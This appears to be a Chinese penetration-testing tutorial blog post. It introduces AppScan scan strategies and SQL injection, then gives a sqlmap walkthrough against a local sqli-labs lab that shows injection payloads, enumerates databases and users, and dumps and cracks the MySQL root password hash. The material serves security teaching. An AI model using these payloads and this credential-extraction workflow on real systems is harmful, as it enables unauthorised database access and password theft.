AppScan渗透测试

AppScan概述

它是由IBM公司开发的一款在Web应用程序渗透测试舞台上使用最广泛的工具,有助于专业安全人员进行Web应用程序自动化脆弱性评估

AppScan 8.0版本中文开源免费

Win10安装需要先安装NET+Framework+3.5
可以用虚拟机WIN7安装

AppScan渗透测试

选择一种测试策略
缺省值:包含多有测试,但不包含侵入式和端口侦听器
仅应用程序:包含所有应用程序级别的测试,但不包含侵入式和端口侦听器
仅基础结构:包含所有基础结构级别的测试,但不包含侵入式和端口贞听器
侵入式:包含所有侵入式测试(可能影响服务器稳定性的测试)
完成:包含所有的AppScan测试 @关键的少数:包含一些成功可能性较高的测试精选,在时间有限时对站点评估可能有用
开发者精要:包含一些成功可能性极高的应用程序测试的精选,在时间有限时对站点评估可能

SQL注入

SQL注入原理

假设我们在浏览器中输入www.sample.com ,由于它只是对页面的简单请求无需对数据库动进行动态请求,所以它不存在SQL注入

当我们输入www.sample.com?testid=23时,我们在URL中传递变量testid ,并且提供值为23 ,由于它是对数据库行动态查询的请求(其中?testid=23表示数据库查询变量) ,所以我们可以该URL中嵌入恶意SQL语句

程序没有对用户输入数据的合法性进行判断,使黑客可以绕 ,过应用程序限制,构造一段SQL语句并传递到数据库中,实现对数据库的操作

SQL注入的危害

数据库信息收集
操作数据库
- 增加数据
- 删除数据
- 更改数据
操作系统
- 借助数据库的内置功能操作系统

SQL 注入演示

搭建SQL注入平台

测试

获取数据库

获取用户

破解密码

具体过程

root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1_____H_____ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[！]法律免责声明：未经事先同意，使用sqlmap攻击目标是非法的。最终用户有责任遵守所有适用的地方、州和联邦法律。开发人员不承担任何责任，也不对本程序造成的任何误用或损坏负责。[*] starting at 16:04:24[16:04:24] [INFO] resuming back-end DBMS 'mysql'
[16:04:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 6790=6790 AND 'NFLR'='NFLRType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 9950 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(9950=9950,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Heej'='HeejType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'emOX'='emOXType: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: id=-7043' UNION ALL SELECT NULL,CONCAT(0x716a716a71,0x5644586c4d4d685549644969524c644e4e6f5953754f496f464a7645624b4341774948694670556f,0x7178787671),NULL-- HGXa
---
[16:04:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[16:04:25] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.10.128'[*] shutting down at 16:04:25root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1  --dbs_____H_____ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 16:06:00[16:06:00] [INFO] resuming back-end DBMS 'mysql'
[16:06:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 6790=6790 AND 'NFLR'='NFLRType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 9950 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(9950=9950,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Heej'='HeejType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'emOX'='emOXType: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: id=-7043' UNION ALL SELECT NULL,CONCAT(0x716a716a71,0x5644586c4d4d685549644969524c644e4e6f5953754f496f464a7645624b4341774948694670556f,0x7178787671),NULL-- HGXa
---
[16:06:01] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[16:06:01] [INFO] fetching database names
[16:06:02] [INFO] the SQL query used returns 6 entries
[16:06:03] [INFO] retrieved: information_schema
[16:06:04] [INFO] retrieved: challenges
[16:06:06] [INFO] retrieved: mysql
[16:06:07] [INFO] retrieved: performance_schema
[16:06:08] [INFO] retrieved: security
[16:06:09] [INFO] retrieved: test
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test[16:06:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.10.128'[*] shutting down at 16:06:09root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1  --users_____H_____ ___[.]_____ ___ ___  {1.1.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 16:06:32[16:06:33] [INFO] resuming back-end DBMS 'mysql'
[16:06:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 6790=6790 AND 'NFLR'='NFLRType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 9950 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(9950=9950,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Heej'='HeejType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'emOX'='emOXType: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: id=-7043' UNION ALL SELECT NULL,CONCAT(0x716a716a71,0x5644586c4d4d685549644969524c644e4e6f5953754f496f464a7645624b4341774948694670556f,0x7178787671),NULL-- HGXa
---
[16:06:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[16:06:34] [INFO] fetching database users
[16:06:35] [INFO] the SQL query used returns 84 entries
[16:06:36] [INFO] retrieved: 'root'@'localhost'
[16:06:37] [INFO] retrieved: 'root'@'localhost'
[16:06:38] [INFO] retrieved: 'root'@'localhost'
[16:06:39] [INFO] retrieved: 'root'@'localhost'
[16:06:40] [INFO] retrieved: 'root'@'localhost'
[16:06:41] [INFO] retrieved: 'root'@'localhost'
[16:06:42] [INFO] retrieved: 'root'@'localhost'
[16:06:43] [INFO] retrieved: 'root'@'localhost'
[16:06:44] [INFO] retrieved: 'root'@'localhost'
[16:06:45] [INFO] retrieved: 'root'@'localhost'
[16:06:46] [INFO] retrieved: 'root'@'localhost'
[16:06:47] [INFO] retrieved: 'root'@'localhost'
[16:06:48] [INFO] retrieved: 'root'@'localhost'
[16:06:49] [INFO] retrieved: 'root'@'localhost'
[16:06:50] [INFO] retrieved: 'root'@'localhost'
[16:06:51] [INFO] retrieved: 'root'@'localhost'
[16:06:52] [INFO] retrieved: 'root'@'localhost'
[16:06:53] [INFO] retrieved: 'root'@'localhost'
[16:06:54] [INFO] retrieved: 'root'@'localhost'
[16:06:55] [INFO] retrieved: 'root'@'localhost'
[16:06:56] [INFO] retrieved: 'root'@'localhost'
[16:06:57] [INFO] retrieved: 'root'@'localhost'
[16:06:58] [INFO] retrieved: 'root'@'localhost'
[16:06:59] [INFO] retrieved: 'root'@'localhost'
[16:07:00] [INFO] retrieved: 'root'@'localhost'
[16:07:02] [INFO] retrieved: 'root'@'localhost'
[16:07:03] [INFO] retrieved: 'root'@'localhost'
[16:07:04] [INFO] retrieved: 'root'@'localhost'
[16:07:05] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:06] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:07] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:08] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:09] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:10] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:11] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:12] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:13] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:14] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:15] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:16] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:17] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:18] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:19] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:20] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:21] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:22] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:23] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:24] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:25] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:26] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:27] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:28] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:29] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:30] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:31] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:32] [INFO] retrieved: 'root'@'127.0.0.1'
[16:07:33] [INFO] retrieved: 'root'@'::1'
[16:07:34] [INFO] retrieved: 'root'@'::1'
[16:07:35] [INFO] retrieved: 'root'@'::1'
[16:07:37] [INFO] retrieved: 'root'@'::1'
[16:07:38] [INFO] retrieved: 'root'@'::1'
[16:07:39] [INFO] retrieved: 'root'@'::1'
[16:07:40] [INFO] retrieved: 'root'@'::1'
[16:07:41] [INFO] retrieved: 'root'@'::1'
[16:07:42] [INFO] retrieved: 'root'@'::1'
[16:07:43] [INFO] retrieved: 'root'@'::1'
[16:07:44] [INFO] retrieved: 'root'@'::1'
[16:07:45] [INFO] retrieved: 'root'@'::1'
[16:07:46] [INFO] retrieved: 'root'@'::1'
[16:07:47] [INFO] retrieved: 'root'@'::1'
[16:07:48] [INFO] retrieved: 'root'@'::1'
[16:07:49] [INFO] retrieved: 'root'@'::1'
[16:07:50] [INFO] retrieved: 'root'@'::1'
[16:07:51] [INFO] retrieved: 'root'@'::1'
[16:07:52] [INFO] retrieved: 'root'@'::1'
[16:07:53] [INFO] retrieved: 'root'@'::1'
[16:07:54] [INFO] retrieved: 'root'@'::1'
[16:07:55] [INFO] retrieved: 'root'@'::1'
[16:07:56] [INFO] retrieved: 'root'@'::1'
[16:07:57] [INFO] retrieved: 'root'@'::1'
[16:07:58] [INFO] retrieved: 'root'@'::1'
[16:07:59] [INFO] retrieved: 'root'@'::1'
[16:08:00] [INFO] retrieved: 'root'@'::1'
[16:08:01] [INFO] retrieved: 'root'@'::1'
database management system users [3]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'[16:08:01] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.10.128'[*] shutting down at 16:08:01root@kali:~# sqlmap -u 192.168.10.128/sqli-labs/less-1/?id=1  --passwords_____H_____ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _||_|V          |_|   http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 16:08:21[16:08:21] [INFO] resuming back-end DBMS 'mysql'
[16:08:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 6790=6790 AND 'NFLR'='NFLRType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 9950 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(9950=9950,1))),0x7178787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Heej'='HeejType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1' AND SLEEP(5) AND 'emOX'='emOXType: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: id=-7043' UNION ALL SELECT NULL,CONCAT(0x716a716a71,0x5644586c4d4d685549644969524c644e4e6f5953754f496f464a7645624b4341774948694670556f,0x7178787671),NULL-- HGXa
---
[16:08:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[16:08:23] [INFO] fetching database users password hashes
[16:08:24] [INFO] the SQL query used returns 3 entries
[16:08:25] [INFO] retrieved: "root","*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"
[16:08:26] [INFO] retrieved: "root","*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"
[16:08:27] [INFO] retrieved: "root","*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:08:33] [INFO] writing hashes to a temporary file '/tmp/sqlmapGKfAZ91581/sqlmaphashes-xdzYdN.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[16:08:39] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 3
what's the list file location?
> 3
[16:09:40] [CRITICAL] there was a problem while loading dictionaries ('unable to read file '3'')
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[16:09:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[16:09:51] [INFO] starting dictionary-based cracking (mysql_passwd)
[16:09:51] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[16:10:03] [INFO] cracked password 'root' for user 'root'
database management system users password hashes:
[*] root [1]:password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1Bclear-text password: root[16:10:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.10.128'[*] shutting down at 16:10:03root@kali:~#

AppScan渗透测试相关推荐

【CyberSecurityLearning 附】渗透测试技术选择题 + 法律法规
1.RDP的端口号为() A. 3389 B. 23 C. 22 D. 443 2.Burp Suite 是用于攻击()的集成平台. A. web 应用程序 B. 客户机 C. 服务器 D. 浏览器 ...
各类环境渗透测试简述
各类环境渗透测试简述一.渗透测试概念渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络 ...
网站渗透测试原理及详细过程
渗透测试实战 site:baidu.com 渗透测试思路 site:baidu.com 带你入门渗透测试的5个项目:https://www.jianshu.com/p/5b82e42ae346 渗透测 ...
小白入坑 Web 渗透测试必备指南
小白如何快速入门由于本人技术性受限制,可能部分内容显得不那么清晰,如有疑问请读者圈联系我.再者,内容不会完全讲清楚,因为本身话题的原因,部分会一笔带过. 小白该如何踏入 Web 安全这个坑呢?我的经 ...
渗透测试入门18之信息收集
渗透测试之信息收集目录信息收集 DNS域名信息的收集整站分析服务器类型(Linux/Windows) 网站容器(Apache/Nginx/Tomcat/IIS) 脚本类型(php/jsp/as ...
渗透测试入门17之一次完整的渗透测试流程
一次完整的渗透测试流程目录渗透测试信息收集漏洞探测漏洞利用内网转发内网渗透痕迹清除撰写渗透测试保告渗透测试渗透测试就是利用我们所掌握的渗透知识,对一个网站进行一步一步的渗透,发现 ...
软件测试52讲-安全第一：渗透测试
渗透测试指的是,由专业安全人员模拟黑客,从其可能存在的位置对系统进行攻击测试, 真正的黑客入侵前找到隐藏的安全漏洞,从而达到保护系统安全的目的. 渗透测试常用方法: 有针对性的测试:--测试人员完全了 ...
3种常见的渗透测试漏洞总结，快来收藏√
越权漏洞越权访问(Broken Access Control,简称BAC)是Web应用程序中一种常见的漏洞,由于其存在范围广.危害大,被OWASP列为Web应用十大安全隐患的第二名. 所谓越权,顾名 ...
网络安全03_推荐书籍_网络安全工具_搜集到的网络安全学习的建议_Web安全/渗透测试技能要求_国内外安全企业网站
网络安全03 一.推荐书籍二.网络安全工具三.搜集到的网络安全学习的建议 1.先网络后安全很多初学者还没搞定网络看懂网络拓扑,就急着研究防火墙或VPN,其实这样就不清楚整个网络架构是如何安全演进 ...